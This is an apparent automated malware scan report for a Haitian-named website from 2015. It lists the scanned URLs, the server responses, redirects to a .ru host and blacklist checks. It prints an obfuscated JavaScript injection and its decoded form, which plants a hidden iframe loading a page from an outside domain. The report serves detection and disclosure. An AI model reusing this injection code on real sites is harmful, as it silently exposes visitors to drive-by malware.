Scanned pages/files
Request | Server response | Status |
http://mwenseayititou.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Jun 2015 01:28:58 GMT Location: http://www.mwenseayititou.com/ Server: Apache Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.mwenseayititou.com/ | 200 OK Content-Length: 7437 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;try{prototype*5;}catch(z){fr="fromChar";f=[9,18,105,204,32,80,100,222,99,234,109,202,110,232,46,206,101,232,69,216,101,218,101,220,116,230,66,242,84,194,103,156,97,218,101,80,39,196,111,200,121,78,41,182,48,186,41,246,13,18,9,18,105,204,114,194,109,202,114,80,41,118,13,18,9,250,32,202,108,230,101,64,123,26,9,18,9,200,111,198,117,218,101,220,116,92,119,228,105,232,101,80,34,120,105,204,114,194,109,202,32,230,114,198,61,78,104,232,116,224,58,94,47,236,119,214,117,232,121,240,99,92,111,220,101, Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://vwkutyxc.onedumb.com/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://vwkutyxc.onedumb.com/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f. <iframe src='http://vwkutyxc.onedumb.com/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.mwenseayititou.com/IAMHAITITOO.pdf | 200 OK Content-Length: 301928 Content-Type: application/pdf | clean |
http://www.mwenseayititou.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Jun 2015 01:29:01 GMT Location: http://peter-safe.ru/mnp/index.php Server: Apache Vary: Accept-Encoding Content-Length: 218 Content-Type: text/html; charset=iso-8859-1 | clean |
http://peter-safe.ru/mnp/index.php | 500 Can't connect to peter-safe.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
http://peter-safe.ru/test404page.js | 500 Can't connect to peter-safe.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
http://mwenseayititou.com/MWENSEAYITITOU.pdf | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Jun 2015 01:29:02 GMT Location: http://www.mwenseayititou.com/MWENSEAYITITOU.pdf Server: Apache Vary: Accept-Encoding Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.mwenseayititou.com/mwenseayititou.pdf | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Jun 2015 01:29:02 GMT Location: http://peter-safe.ru/mnp/index.php Server: Apache Vary: Accept-Encoding Content-Length: 218 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mwenseayititou.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:28:58 GMT
Location: http://www.mwenseayititou.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
GET / HTTP/1.1
Host: mwenseayititou.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:28:58 GMT
Location: http://www.mwenseayititou.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mwenseayititou.com
Referer: http://www.google.com/search?q=mwenseayititou.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mwenseayititou.com
Referer: http://www.google.com/search?q=mwenseayititou.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mwenseayititou.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mwenseayititou.com/
Result: mwenseayititou.com is not infected or malware details are not published yet.
Result: mwenseayititou.com is not infected or malware details are not published yet.